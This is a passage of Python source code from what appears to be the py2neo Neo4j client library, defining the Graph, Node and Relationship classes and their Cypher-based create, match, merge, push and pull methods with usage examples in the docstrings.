corresponding to the ``/`` URI. If no URI is supplied to\n the constructor, a value is taken from the ``NEO4J_URI`` environment\n variable (if set) otherwise a default of ``http://localhost:7474/``\n is used.\n \"\"\"\n\n __instances = {}\n\n __authentication = None\n __graph = None\n\n def __new__(cls, uri=None):\n if uri is None:\n uri = NEO4J_URI\n uri = ustr(uri)\n if not uri.endswith(\"/\"):\n uri += \"/\"\n try:\n inst = cls.__instances[uri]\n except KeyError:\n if NEO4J_AUTH:\n user_name, password = NEO4J_AUTH.partition(\":\")[0::2]\n authenticate(URI(uri).host_port, user_name, password)\n inst = super(DBMS, cls).__new__(cls)\n inst.__resource = Resource(uri)\n inst.__graph = None\n cls.__instances[uri] = inst\n return inst\n\n def __repr__(self):\n return \"<DBMS uri=%r>\" % self.uri.string\n\n def __eq__(self, other):\n try:\n return self.uri == other.uri\n except AttributeError:\n return False\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __hash__(self):\n return hash(self.uri)\n\n @property\n def graph(self):\n \"\"\" The graph exposed by this service.\n\n :rtype: :class:`.Graph`\n \"\"\"\n if self.__graph is None:\n # The graph URI used to be determined via\n # discovery but another HTTP call sometimes\n # caused problems in the middle of other\n # operations (such as hydration) when using\n # concurrent code. Therefore, the URI is now\n # constructed manually.\n self.__graph = Graph(self.uri.string + \"db/data/\")\n return self.__graph\n\n @property\n def resource(self):\n \"\"\" The contained resource object for this instance.\n\n :rtype: :class:`py2neo.Resource`\n \"\"\"\n return self.__resource\n\n @property\n def uri(self):\n \"\"\" The full URI of the contained resource.\n \"\"\"\n return self.resource.uri\n\n\nclass Graph(object):\n \"\"\" The `Graph` class provides a wrapper around the\n `REST API `_ exposed\n by a running Neo4j database server and is identified by the base URI of\n the graph database. If no URI is specified, a default value is taken from\n the ``NEO4J_URI`` environment variable. If this is not set, a default of\n `http://localhost:7474/db/data/` is assumed. Therefore, the simplest way\n to connect to a running service is to use::\n\n >>> from py2neo import Graph\n >>> graph = Graph()\n\n An explicitly specified graph database URI can also be passed to the\n constructor as a string::\n\n >>> other_graph = Graph(\"http://camelot:1138/db/data/\")\n\n If the database server requires authorisation, the credentials can also\n be specified within the URI::\n\n >>> secure_graph = Graph(\"http://arthur:excalibur@camelot:1138/db/data/\")\n\n Once obtained, the `Graph` instance provides direct or indirect access\n to most of the functionality available within py2neo.\n\n \"\"\"\n\n __instances = {}\n\n __cypher = None\n __schema = None\n __node_labels = None\n __relationship_types = None\n\n def __new__(cls, uri=None):\n if uri is None:\n uri = DBMS().graph.uri.string\n if not uri.endswith(\"/\"):\n uri += \"/\"\n key = (cls, uri)\n try:\n inst = cls.__instances[key]\n except KeyError:\n inst = super(Graph, cls).__new__(cls)\n inst.resource = Resource(uri)\n cls.__instances[key] = inst\n return inst\n\n def __repr__(self):\n return \"<Graph uri=%r>\" % self.uri.string\n\n def __hash__(self):\n return hash(self.uri)\n\n def __len__(self):\n return self.size()\n\n def __bool__(self):\n return True\n\n def __nonzero__(self):\n return True\n\n def __contains__(self, entity):\n return entity.bound and entity.uri.string.startswith(self.uri.string)\n\n @property\n def cypher(self):\n \"\"\" The Cypher execution resource for this graph providing access to\n all Cypher functionality for the underlying database, both simple\n and transactional.\n\n ::\n\n >>> from py2neo import Graph\n >>> graph = Graph()\n >>> graph.cypher.run(\"CREATE (a:Person {name:{N}})\", {\"N\": \"Alice\"})\n\n :rtype: :class:`py2neo.cypher.CypherEngine`\n\n \"\"\"\n if self.__cypher is None:\n from py2neo.cypher import CypherEngine\n metadata = self.resource.metadata\n self.__cypher = CypherEngine(metadata.get(\"transaction\"))\n return self.__cypher\n\n def create(self, g):\n \"\"\" Create one or more remote nodes, relationships or paths in a\n single transaction. The entity values provided must be either\n existing entity objects (such as nodes or relationships) or values\n that can be cast to them.\n\n For example, to create a remote node from a local :class:`Node` object::\n\n from py2neo import Graph, Node\n graph = Graph()\n alice = Node(\"Person\", name=\"Alice\")\n graph.create(alice)\n\n Then, create a second node and a relationship connecting both nodes::\n\n german, speaks = graph.create({\"name\": \"German\"}, (alice, \"SPEAKS\", 0))\n\n This second example shows how :class:`dict` and :class:`tuple` objects\n can also be used to create nodes and relationships respectively. The\n zero value in the relationship tuple references the zeroth item created\n within that transaction, i.e. the \"German\" node.\n\n .. note::\n If an object is passed to this method that is already bound to\n a remote entity, that argument will be ignored and nothing will\n be created.\n\n :arg entities: One or more existing graph entities or values that\n can be cast to entities.\n :return: A tuple of all entities created (or ignored) of the same\n length and order as the arguments passed in.\n\n \"\"\"\n # TODO update examples in docstring\n self.cypher.create(g)\n\n def create_unique(self, t):\n \"\"\" Create one or more unique paths or relationships in a single\n transaction. 
This is similar to :meth:`create` but uses a Cypher\n `CREATE UNIQUE `_\n clause to ensure that only relationships that do not already exist are created.\n \"\"\"\n # TODO update examples in docstring\n self.cypher.create_unique(t)\n\n @property\n def dbms(self):\n return self.resource.dbms\n\n def delete(self, g):\n \"\"\" Delete one or more nodes, relationships and/or paths.\n \"\"\"\n self.cypher.delete(g)\n\n def delete_all(self):\n \"\"\" Delete all nodes and relationships from the graph.\n\n .. warning::\n This method will permanently remove **all** nodes and relationships\n from the graph and cannot be undone.\n \"\"\"\n self.cypher.run(\"MATCH (a) OPTIONAL MATCH (a)-[r]->() DELETE r, a\")\n\n def detach(self, g):\n \"\"\" Delete one or more relationships.\n \"\"\"\n self.cypher.detach(g)\n\n def exists(self, *entities):\n \"\"\" Determine whether a number of graph entities all exist within the database.\n \"\"\"\n tx = self.cypher.begin()\n cursors = []\n for entity in entities:\n try:\n if isinstance(entity, Node):\n cursors.append(tx.run(\"MATCH (a) WHERE id(a)={x} \"\n \"RETURN count(a)\", x=entity))\n elif isinstance(entity, Relationship):\n cursors.append(tx.run(\"MATCH ()-[r]->() WHERE id(r)={x} \"\n \"RETURN count(r)\", x=entity))\n elif isinstance(entity, Path):\n for node in entity.nodes():\n cursors.append(tx.run(\"MATCH (a) WHERE id(a)={x} \"\n \"RETURN count(a)\", x=node))\n for rel in entity.relationships():\n cursors.append(tx.run(\"MATCH ()-[r]->() WHERE id(r)={x} \"\n \"RETURN count(r)\", x=rel))\n else:\n try:\n nodes = entity.nodes()\n relationships = entity.relationships()\n except AttributeError:\n raise TypeError(\"Object %r is not graphy\" % entity)\n else:\n for node in nodes:\n cursors.append(tx.run(\"MATCH (a) WHERE id(a)={x} \"\n \"RETURN count(a)\", x=node))\n for rel in relationships:\n cursors.append(tx.run(\"MATCH ()-[r]->() WHERE id(r)={x} \"\n \"RETURN count(r)\", x=rel))\n except BindError:\n pass\n count = len(tx.statements)\n tx.commit()\n if count == 0:\n return None\n else:\n return sum(cursor.evaluate() for cursor in cursors) == count\n\n def find(self, label, property_key=None, property_value=None, limit=None):\n \"\"\" Iterate through a set of labelled nodes, optionally filtering\n by property key and value\n \"\"\"\n if not label:\n raise ValueError(\"Empty label\")\n from py2neo.cypher import cypher_escape\n if property_key is None:\n statement = \"MATCH (n:%s) RETURN n,labels(n)\" % cypher_escape(label)\n parameters = {}\n else:\n statement = \"MATCH (n:%s {%s:{V}}) RETURN n,labels(n)\" % (\n cypher_escape(label), cypher_escape(property_key))\n parameters = {\"V\": property_value}\n if limit:\n statement += \" LIMIT %s\" % limit\n cursor = self.cypher.run(statement, parameters)\n while cursor.move():\n a = cursor[0]\n a.labels().update(cursor[1])\n yield a\n cursor.close()\n\n def find_one(self, label, property_key=None, property_value=None):\n \"\"\" Find a single node by label and optional property. This method is\n intended to be used with a unique constraint and does not fail if more\n than one matching node is found.\n \"\"\"\n for node in self.find(label, property_key, property_value, limit=1):\n return node\n\n def hydrate(self, data, inst=None):\n \"\"\" Hydrate a dictionary of data to produce a :class:`.Node`,\n :class:`.Relationship` or other graph object instance. 
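(For illustration, a minimal node payload has the form\n ``{\"self\": \"http://localhost:7474/db/data/node/0\"}``; the host and node ID\n here are placeholders.) 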
The\n data structure and values expected are those produced by the\n `REST API `__.\n\n :arg data: dictionary of data to hydrate\n\n \"\"\"\n if isinstance(data, dict):\n if \"errors\" in data and data[\"errors\"]:\n from py2neo.status import CypherError\n for error in data[\"errors\"]:\n raise CypherError.hydrate(error)\n elif \"self\" in data:\n if \"type\" in data:\n return Relationship.hydrate(data, inst)\n else:\n return Node.hydrate(data, inst)\n elif \"nodes\" in data and \"relationships\" in data:\n if \"directions\" not in data:\n directions = []\n relationships = self.cypher.evaluate(\n \"MATCH ()-[r]->() WHERE id(r) IN {x} RETURN collect(r)\",\n x=[int(uri.rpartition(\"/\")[-1]) for uri in data[\"relationships\"]])\n node_uris = data[\"nodes\"]\n for i, relationship in enumerate(relationships):\n if relationship.start_node().uri == node_uris[i]:\n directions.append(\"->\")\n else:\n directions.append(\"<-\")\n data[\"directions\"] = directions\n return Path.hydrate(data)\n elif \"results\" in data:\n return self.hydrate(data[\"results\"][0])\n elif \"columns\" in data and \"data\" in data:\n from py2neo.cypher import Cursor\n result = Cursor(self, hydrate=True)\n result._process(data)\n return result\n elif \"neo4j_version\" in data:\n return self\n else:\n warn(\"Map literals returned over the Neo4j REST interface are ambiguous \"\n \"and may be hydrated as graph objects\")\n return data\n elif is_collection(data):\n return type(data)(map(self.hydrate, data))\n else:\n return data\n\n def match(self, start_node=None, rel_type=None, end_node=None, bidirectional=False, limit=None):\n \"\"\" Return an iterator for all relationships matching the\n specified criteria.\n\n For example, to find all of Alice's friends::\n\n for rel in graph.match(start_node=alice, rel_type=\"FRIEND\"):\n print(rel.end_node.properties[\"name\"])\n\n :arg start_node: :attr:`~py2neo.Node.bound` start :class:`~py2neo.Node` to match or\n :const:`None` if any\n :arg rel_type: type of relationships to match or :const:`None` if any\n :arg end_node: :attr:`~py2neo.Node.bound` end :class:`~py2neo.Node` to match or\n :const:`None` if any\n :arg bidirectional: :const:`True` if reversed relationships should also be included\n :arg limit: maximum number of relationships to match or :const:`None` if no limit\n :return: matching relationships\n :rtype: generator\n \"\"\"\n if start_node is None and end_node is None:\n statement = \"MATCH (a)\"\n parameters = {}\n elif end_node is None:\n statement = \"MATCH (a) WHERE id(a)={A}\"\n start_node = node(start_node)\n if not start_node.bound:\n raise TypeError(\"Nodes for relationship match end points must be bound\")\n parameters = {\"A\": start_node}\n elif start_node is None:\n statement = \"MATCH (b) WHERE id(b)={B}\"\n end_node = node(end_node)\n if not end_node.bound:\n raise TypeError(\"Nodes for relationship match end points must be bound\")\n parameters = {\"B\": end_node}\n else:\n statement = \"MATCH (a) WHERE id(a)={A} MATCH (b) WHERE id(b)={B}\"\n start_node = node(start_node)\n end_node = node(end_node)\n if not start_node.bound or not end_node.bound:\n raise TypeError(\"Nodes for relationship match end points must be bound\")\n parameters = {\"A\": start_node, \"B\": end_node}\n if rel_type is None:\n rel_clause = \"\"\n elif is_collection(rel_type):\n rel_clause = \":\" + \"|:\".join(\"`{0}`\".format(_) for _ in rel_type)\n else:\n rel_clause = \":`{0}`\".format(rel_type)\n if bidirectional:\n statement += \" MATCH (a)-[r\" + rel_clause + \"]-(b) RETURN 
r\"\n else:\n statement += \" MATCH (a)-[r\" + rel_clause + \"]->(b) RETURN r\"\n if limit is not None:\n statement += \" LIMIT {0}\".format(int(limit))\n cursor = self.cypher.run(statement, parameters)\n while cursor.move():\n yield cursor[\"r\"]\n\n def match_one(self, start_node=None, rel_type=None, end_node=None, bidirectional=False):\n \"\"\" Return a single relationship matching the\n specified criteria. See :meth:`~py2neo.Graph.match` for\n argument details.\n \"\"\"\n rels = list(self.match(start_node, rel_type, end_node,\n bidirectional, 1))\n if rels:\n return rels[0]\n else:\n return None\n\n def merge(self, label, property_key=None, property_value=None, limit=None):\n \"\"\" Match or create a node by label and optional property and return\n all matching nodes.\n \"\"\"\n if not label:\n raise ValueError(\"Empty label\")\n from py2neo.cypher import cypher_escape\n if property_key is None:\n statement = \"MERGE (n:%s) RETURN n,labels(n)\" % cypher_escape(label)\n parameters = {}\n elif not isinstance(property_key, string):\n raise TypeError(\"Property key must be textual\")\n elif property_value is None:\n raise ValueError(\"Both key and value must be specified for a property\")\n else:\n statement = \"MERGE (n:%s {%s:{V}}) RETURN n,labels(n)\" % (\n cypher_escape(label), cypher_escape(property_key))\n parameters = {\"V\": coerce_property(property_value)}\n if limit:\n statement += \" LIMIT %s\" % limit\n cursor = self.cypher.post(statement, parameters)\n for record in cursor.collect():\n dehydrated = record[0]\n dehydrated.setdefault(\"metadata\", {})[\"labels\"] = record[1]\n yield self.hydrate(dehydrated)\n\n def merge_one(self, label, property_key=None, property_value=None):\n \"\"\" Match or create a node by label and optional property and return a\n single matching node. This method is intended to be used with a unique\n constraint and does not fail if more than one matching node is found.\n\n >>> graph = Graph()\n >>> person = graph.merge_one(\"Person\", \"email\", \"bob@example.com\")\n\n \"\"\"\n for node in self.merge(label, property_key, property_value, limit=1):\n return node\n\n @property\n def neo4j_version(self):\n \"\"\" The database software version as a 4-tuple of (``int``, ``int``,\n ``int``, ``str``).\n \"\"\"\n return version_tuple(self.resource.metadata[\"neo4j_version\"])\n\n def node(self, id_):\n \"\"\" Fetch a node by ID. 
This method creates an object representing the\n remote node with the ID specified but fetches no data from the server.\n For this reason, there is no guarantee that the entity returned\n actually exists.\n \"\"\"\n resource = self.resource.resolve(\"node/%s\" % id_)\n uri_string = resource.uri.string\n try:\n return Node.cache[uri_string]\n except KeyError:\n node = self.cypher.evaluate(\"MATCH (a) WHERE id(a)={x} \"\n \"RETURN a\", x=id_)\n if node is None:\n raise IndexError(\"Node %d not found\" % id_)\n else:\n return node\n\n @property\n def node_labels(self):\n \"\"\" The set of node labels currently defined within the graph.\n \"\"\"\n if self.__node_labels is None:\n self.__node_labels = Resource(self.uri.string + \"labels\")\n return frozenset(self.__node_labels.get().content)\n\n def open_browser(self):\n \"\"\" Open a page in the default system web browser pointing at\n the Neo4j browser application for this graph.\n \"\"\"\n webbrowser.open(self.dbms.resource.uri.string)\n\n def order(self):\n \"\"\" The number of nodes in this graph.\n \"\"\"\n statement = \"MATCH (n) RETURN count(n)\"\n return self.cypher.evaluate(statement)\n\n def pull(self, *entities):\n \"\"\" Pull data to one or more entities from their remote counterparts.\n \"\"\"\n if not entities:\n return\n nodes = {}\n relationships = set()\n for entity in entities:\n for node in entity.nodes():\n nodes[node] = None\n relationships.update(entity.relationships())\n tx = self.cypher.begin()\n for node in nodes:\n cursor = tx.run(\"MATCH (a) WHERE id(a)={x} \"\n \"RETURN a, labels(a)\", x=node._id)\n cursor.cache[\"a\"] = node\n nodes[node] = cursor\n for relationship in relationships:\n cursor = tx.run(\"MATCH ()-[r]->() WHERE id(r)={x} \"\n \"RETURN r\", x=relationship._id)\n cursor.cache[\"r\"] = relationship\n tx.commit()\n for node, cursor in nodes.items():\n labels = node.labels()\n labels.clear()\n labels.update(cursor.evaluate(1))\n\n def push(self, *entities):\n \"\"\" Push data from one or more entities to their remote counterparts.\n \"\"\"\n batch = []\n i = 0\n for entity in entities:\n for node in entity.nodes():\n batch.append({\"id\": i, \"method\": \"PUT\",\n \"to\": \"node/%d/properties\" % node._id,\n \"body\": dict(node)})\n i += 1\n batch.append({\"id\": i, \"method\": \"PUT\",\n \"to\": \"node/%d/labels\" % node._id,\n \"body\": list(node.labels())})\n i += 1\n for relationship in entity.relationships():\n batch.append({\"id\": i, \"method\": \"PUT\",\n \"to\": \"relationship/%d/properties\" % relationship._id,\n \"body\": dict(relationship)})\n i += 1\n self.resource.resolve(\"batch\").post(batch)\n\n def relationship(self, id_):\n \"\"\" Fetch a relationship by ID.\n \"\"\"\n resource = self.resource.resolve(\"relationship/\" + str(id_))\n uri_string = resource.uri.string\n try:\n return Relationship.cache[uri_string]\n except KeyError:\n relationship = self.cypher.evaluate(\"MATCH ()-[r]->() WHERE id(r)={x} \"\n \"RETURN r\", x=id_)\n if relationship is None:\n raise IndexError(\"Relationship %d not found\" % id_)\n else:\n return relationship\n\n @property\n def relationship_types(self):\n \"\"\" The set of relationship types currently defined within the graph.\n \"\"\"\n if self.__relationship_types is None:\n self.__relationship_types = Resource(self.uri.string + \"relationship/types\")\n return frozenset(self.__relationship_types.get().content)\n\n @property\n def schema(self):\n \"\"\" The schema resource for this graph.\n\n :rtype: :class:`SchemaResource `\n \"\"\"\n if self.__schema is 
None:\n from py2neo.schema import SchemaResource\n self.__schema = SchemaResource(self.uri.string + \"schema\")\n return self.__schema\n\n def size(self):\n \"\"\" The number of relationships in this graph.\n \"\"\"\n statement = \"MATCH ()-[r]->() RETURN count(r)\"\n return self.cypher.evaluate(statement)\n\n def supports_auth(self):\n \"\"\" Returns :py:`True` if auth is supported by this version of Neo4j.\n \"\"\"\n return self.neo4j_version >= (2, 2)\n\n @property\n def uri(self):\n return self.resource.uri\n\n\nclass Entity(object):\n \"\"\" Base class for objects that can be optionally bound to a remote resource. This\n class is essentially a container for a :class:`.Resource` instance.\n \"\"\"\n\n #: The class of error raised by failure responses from the contained resource.\n error_class = GraphError\n\n __resource__ = None\n\n _bind_pending_tx = None\n\n def _process_if_bind_pending(self):\n if self._bind_pending_tx:\n self._bind_pending_tx.process()\n self._bind_pending_tx = None\n\n def __eq__(self, other):\n self._process_if_bind_pending()\n try:\n return self.bound and other.bound and self.uri == other.uri\n except AttributeError:\n return False\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def bind(self, uri, metadata=None):\n \"\"\" Associate this «class.lower» with a remote resource.\n\n :arg uri: The URI identifying the remote resource to which to bind.\n :arg metadata: Dictionary of initial metadata to attach to the contained resource.\n\n \"\"\"\n if \"{\" in uri and \"}\" in uri:\n if metadata:\n raise ValueError(\"Initial metadata cannot be passed to a resource template\")\n self.__resource__ = ResourceTemplate(uri)\n else:\n self.__resource__ = Resource(uri, metadata)\n self.__resource__.error_class = self.error_class\n self._bind_pending_tx = None\n\n def set_bind_pending(self, tx):\n \"\"\" Flag that this entity is due to be bound on processing of\n the specified transaction.\n\n :param tx:\n :return:\n \"\"\"\n self._bind_pending_tx = tx\n\n @property\n def bound(self):\n \"\"\" :const:`True` if this object is bound to a remote resource,\n :const:`False` otherwise.\n \"\"\"\n self._process_if_bind_pending()\n return self.__resource__ is not None\n\n @property\n def graph(self):\n \"\"\" The graph associated with the remote resource.\n\n :rtype: :class:`.Graph`\n \"\"\"\n self._process_if_bind_pending()\n return self.dbms.graph\n\n @property\n def cypher(self):\n \"\"\" The Cypher engine associated with the remote resource.\n\n :rtype: :class:`.CypherEngine`\n \"\"\"\n self._process_if_bind_pending()\n return self.dbms.graph.cypher\n\n @property\n def ref(self):\n \"\"\" The URI of the remote resource relative to its graph.\n\n :rtype: string\n \"\"\"\n self._process_if_bind_pending()\n return self.resource.ref\n\n @property\n def resource(self):\n \"\"\" The remote resource to which this object is bound.\n\n :rtype: :class:`.Resource`\n :raises: :class:`py2neo.BindError`\n \"\"\"\n self._process_if_bind_pending()\n if self.bound:\n return self.__resource__\n else:\n raise BindError(\"Local entity is not bound to a remote entity\")\n\n @property\n def dbms(self):\n \"\"\" The root service associated with the remote resource.\n\n :return: :class:`.DBMS`\n \"\"\"\n self._process_if_bind_pending()\n return self.resource.dbms\n\n def unbind(self):\n \"\"\" Detach this object from any remote resource.\n \"\"\"\n self.__resource__ = None\n self._bind_pending_tx = None\n\n @property\n def uri(self):\n \"\"\" The full URI of the remote resource.\n 
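If the entity is bound to a resource template rather than a concrete\n resource, the URI template is returned instead.\n 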
\"\"\"\n self._process_if_bind_pending()\n resource = self.resource\n try:\n return resource.uri\n except AttributeError:\n return resource.uri_template\n\n\nclass Node(PrimitiveNode, Entity):\n \"\"\" A graph node that may optionally be bound to a remote counterpart\n in a Neo4j database. Nodes may contain a set of named :attr:`~py2neo.Node.properties` and\n may have one or more :attr:`labels ` applied to them::\n\n >>> from py2neo import Node\n >>> alice = Node(\"Person\", name=\"Alice\")\n >>> banana = Node(\"Fruit\", \"Food\", colour=\"yellow\", tasty=True)\n\n All positional arguments passed to the constructor are interpreted\n as labels and all keyword arguments as properties. It is also possible to\n construct Node instances from other data types (such as a dictionary)\n by using the :meth:`.cast_node` class method::\n\n >>> bob = node({\"name\": \"Bob Robertson\", \"age\": 44})\n\n Labels and properties can be accessed and modified using the\n :attr:`labels ` and :attr:`~py2neo.Node.properties`\n attributes respectively. The former is an instance of :class:`.LabelSet`,\n which extends the built-in :class:`set` class, and the latter is an\n instance of :class:`.PropertySet` which extends :class:`dict`.\n\n >>> alice[\"name\"]\n 'Alice'\n >>> alice.labels()\n {'Person'}\n >>> alice.add_label(\"Employee\")\n >>> alice[\"employee_no\"] = 3456\n >>> alice\n \n\n One of the core differences between a :class:`.PropertySet` and a standard\n dictionary is in how it handles :const:`None` and missing values. As with actual Neo4j\n properties, missing values and those equal to :const:`None` are equivalent.\n \"\"\"\n\n cache = ThreadLocalWeakValueDictionary()\n\n __id = None\n\n @classmethod\n def hydrate(cls, data, inst=None):\n \"\"\" Hydrate a dictionary of data to produce a :class:`.Node` instance.\n The data structure and values expected are those produced by the\n `REST API `__\n although only the ``self`` value is required.\n\n :arg data: dictionary of data to hydrate\n :arg inst: an existing :class:`.Node` instance to overwrite with new values\n\n \"\"\"\n self = data[\"self\"]\n if inst is None:\n new_inst = cls()\n new_inst.__stale.update({\"labels\", \"properties\"})\n inst = cls.cache.setdefault(self, new_inst)\n # The check below is a workaround for http://bugs.python.org/issue19542\n # See also: https://github.com/nigelsmall/py2neo/issues/391\n if inst is None:\n inst = cls.cache[self] = new_inst\n cls.cache[self] = inst\n inst.bind(self, data)\n if \"data\" in data:\n inst.__stale.discard(\"properties\")\n inst.clear()\n inst.update(data[\"data\"])\n if \"metadata\" in data:\n inst.__stale.discard(\"labels\")\n metadata = data[\"metadata\"]\n inst.clear_labels()\n inst.update_labels(metadata[\"labels\"])\n return inst\n\n def __init__(self, *labels, **properties):\n PrimitiveNode.__init__(self, *labels, **properties)\n self.__stale = set()\n\n def __repr__(self):\n s = [self.__class__.__name__]\n if self.bound:\n s.append(\"graph=%r\" % self.graph.uri.string)\n s.append(\"ref=%r\" % self.ref)\n if \"labels\" in self.__stale:\n s.append(\"labels=?\")\n else:\n s.append(\"labels=%r\" % set(self.labels()))\n if \"properties\" in self.__stale:\n s.append(\"properties=?\")\n else:\n s.append(\"properties=%r\" % dict(self))\n else:\n s.append(\"labels=%r\" % set(self.labels()))\n s.append(\"properties=%r\" % dict(self))\n return \"<\" + \" \".join(s) + \">\"\n\n def __str__(self):\n return xstr(self.__unicode__())\n\n def __unicode__(self):\n from py2neo.cypher import CypherWriter\n s 
= StringIO()\n writer = CypherWriter(s)\n if self.bound:\n writer.write_node(self, \"n\" + ustr(self._id))\n else:\n writer.write_node(self)\n return s.getvalue()\n\n def __eq__(self, other):\n if other is None:\n return False\n other = node(other)\n if self.bound and other.bound:\n return self.resource == other.resource\n else:\n return PrimitiveNode.__eq__(self, other)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __hash__(self):\n if self.bound:\n return hash(self.resource.uri)\n else:\n return PrimitiveNode.__hash__(self)\n\n def __add__(self, other):\n return Path(self, other)\n\n def __getitem__(self, item):\n if self.bound and \"properties\" in self.__stale:\n self.refresh()\n return PrimitiveNode.__getitem__(self, item)\n\n @property\n def _id(self):\n \"\"\" The internal ID of this node within the database.\n \"\"\"\n if self.__id is None:\n self.__id = int(self.uri.path.segments[-1])\n return self.__id\n\n @property\n def ref(self):\n \"\"\" The URI of this node relative to its graph.\n\n :rtype: string\n \"\"\"\n return \"node/%s\" % self._id\n\n def bind(self, uri, metadata=None):\n \"\"\" Associate this node with a remote node.\n\n :arg uri: The URI identifying the remote node to which to bind.\n :arg metadata: Dictionary of initial metadata to attach to the contained resource.\n\n \"\"\"\n Entity.bind(self, uri, metadata)\n self.cache[uri] = self\n\n def degree(self):\n \"\"\" The number of relationships attached to this node.\n \"\"\"\n return self.cypher.evaluate(\"MATCH (a)-[r]-() WHERE id(a)={n} RETURN count(r)\", n=self)\n\n @deprecated(\"Node.exists() is deprecated, use graph.exists(node) instead\")\n def exists(self):\n \"\"\" :const:`True` if this node exists in the database,\n :const:`False` otherwise.\n \"\"\"\n return self.graph.exists(self)\n\n def labels(self):\n \"\"\" The set of labels attached to this node.\n \"\"\"\n if self.bound and \"labels\" in self.__stale:\n self.refresh()\n return PrimitiveNode.labels(self)\n\n @deprecated(\"Node.match() is deprecated, use graph.match(node, ...) instead\")\n def match(self, rel_type=None, other_node=None, limit=None):\n \"\"\" Return an iterator for all relationships attached to this node\n that match the specified criteria. See :meth:`.Graph.match` for\n argument details.\n \"\"\"\n return self.graph.match(self, rel_type, other_node, True, limit)\n\n @deprecated(\"Node.match_incoming() is deprecated, use graph.match(node, ...) instead\")\n def match_incoming(self, rel_type=None, start_node=None, limit=None):\n \"\"\" Return an iterator for all incoming relationships to this node\n that match the specified criteria. See :meth:`.Graph.match` for\n argument details.\n \"\"\"\n return self.graph.match(start_node, rel_type, self, False, limit)\n\n @deprecated(\"Node.match_outgoing() is deprecated, use graph.match(node, ...) instead\")\n def match_outgoing(self, rel_type=None, end_node=None, limit=None):\n \"\"\" Return an iterator for all outgoing relationships from this node\n that match the specified criteria. See :meth:`.Graph.match` for\n argument details.\n \"\"\"\n return self.graph.match(self, rel_type, end_node, False, limit)\n\n @property\n @deprecated(\"Node.properties is deprecated, use dict(node) instead\")\n def properties(self):\n \"\"\" The set of properties attached to this node. Properties\n can also be read from and written to any :class:`Node`\n by using the index syntax directly. 
This means\n the following statements are equivalent::\n\n node.properties[\"name\"] = \"Alice\"\n node[\"name\"] = \"Alice\"\n\n \"\"\"\n if self.bound and \"properties\" in self.__stale:\n self.refresh()\n return dict(self)\n\n @deprecated(\"Node.pull() is deprecated, use graph.pull(node) instead\")\n def pull(self):\n \"\"\" Pull data to this node from its remote counterpart. Consider\n using :meth:`.Graph.pull` instead for batches of nodes.\n \"\"\"\n self.graph.pull(self)\n\n @deprecated(\"Node.push() is deprecated, use graph.push(node) instead\")\n def push(self):\n \"\"\" Push data from this node to its remote counterpart. Consider\n using :meth:`.Graph.push` instead for batches of nodes.\n \"\"\"\n self.graph.push(self)\n\n def refresh(self):\n # Non-destructive pull.\n # Note: this may fail if attempted against an entity mid-transaction\n # that has not yet been committed.\n query = \"MATCH (a) WHERE id(a)={a} RETURN a,labels(a)\"\n content = self.cypher.post(query, {\"a\": self._id})\n try:\n dehydrated, label_metadata = content.select()\n except IndexError:\n raise GraphError(\"Node with ID %s not found\" % self._id)\n else:\n dehydrated.setdefault(\"metadata\", {})[\"labels\"] = label_metadata\n Node.hydrate(dehydrated, self)\n\n def unbind(self):\n \"\"\" Detach this node from any remote counterpart.\n \"\"\"\n try:\n del self.cache[self.uri]\n except KeyError:\n pass\n Entity.unbind(self)\n self.__id = None\n\n\nclass NodeProxy(object):\n \"\"\" Base class for objects that can be used in place of a node.\n \"\"\"\n pass\n\n\nclass Relationship(PrimitiveRelationship, Entity):\n \"\"\" A graph relationship that may optionally be bound to a remote counterpart\n in a Neo4j database. Relationships require a triple of start node, relationship\n type and end node and may also optionally be given one or more properties::\n\n >>> from py2neo import Node, Relationship\n >>> alice = Node(\"Person\", name=\"Alice\")\n >>> bob = Node(\"Person\", name=\"Bob\")\n >>> alice_knows_bob = Relationship(alice, \"KNOWS\", bob, since=1999)\n\n \"\"\"\n\n cache = ThreadLocalWeakValueDictionary()\n\n __id = None\n\n @classmethod\n def hydrate(cls, data, inst=None):\n \"\"\" Hydrate a dictionary of data to produce a :class:`.Relationship` instance.\n The data structure and values expected are those produced by the\n `REST API `__.\n\n :arg data: dictionary of data to hydrate\n :arg inst: an existing :class:`.Relationship` instance to overwrite with new values\n\n \"\"\"\n self = data[\"self\"]\n if inst is None:\n new_inst = cls(Node.hydrate({\"self\": data[\"start\"]}),\n data.get(\"type\"),\n Node.hydrate({\"self\": data[\"end\"]}),\n **data.get(\"data\", {}))\n inst = cls.cache.setdefault(self, new_inst)\n # The check below is a workaround for http://bugs.python.org/issue19542\n # See also: https://github.com/nigelsmall/py2neo/issues/391\n if inst is None:\n inst = cls.cache[self] = new_inst\n else:\n Node.hydrate({\"self\": data[\"start\"]}, inst.start_node())\n Node.hydrate({\"self\": data[\"end\"]}, inst.end_node())\n inst._type = data.get(\"type\")\n if \"data\" in data:\n inst.clear()\n inst.update(data[\"data\"])\n else:\n inst.__stale.add(\"properties\")\n cls.cache[self] = inst\n inst.bind(self, data)\n return inst\n\n def __init__(self, *nodes, **properties):\n n = []\n p = {}\n for value in nodes:\n if isinstance(value, string):\n n.append(value)\n elif isinstance(value, tuple) and len(value) == 2 and isinstance(value[0], string):\n t, props = value\n n.append(t)\n p.update(props)\n 
else:\n n.append(node(value))\n p.update(properties)\n PrimitiveRelationship.__init__(self, *n, **p)\n self.__stale = set()\n\n def __repr__(self):\n s = [self.__class__.__name__]\n if self.bound:\n s.append(\"graph=%r\" % self.graph.uri.string)\n s.append(\"ref=%r\" % self.ref)\n s.append(\"start=%r\" % self.start_node().ref)\n s.append(\"end=%r\" % self.end_node().ref)\n if self._type is None:\n s.append(\"type=?\")\n else:\n s.append(\"type=%r\" % self._type)\n if \"properties\" in self.__stale:\n s.append(\"properties=?\")\n else:\n s.append(\"properties=%r\" % dict(self))\n else:\n s.append(\"type=%r\" % self._type)\n s.append(\"properties=%r\" % dict(self))\n return \"<\" + \" \".join(s) + \">\"\n\n def __str__(self):\n return xstr(self.__unicode__())\n\n def __unicode__(self):\n from py2neo.cypher import CypherWriter\n s = StringIO()\n writer = CypherWriter(s)\n writer.write_relationship(self, \"r%s\" % self._id if self.bound else \"\", self)\n return s.getvalue()\n\n def __eq__(self, other):\n if other is None:\n return False\n other = relationship(other)\n if self.bound and other.bound:\n return self.resource == other.resource\n else:\n return PrimitiveRelationship.__eq__(self, other)\n\n def __ne__(self, other):\n return not 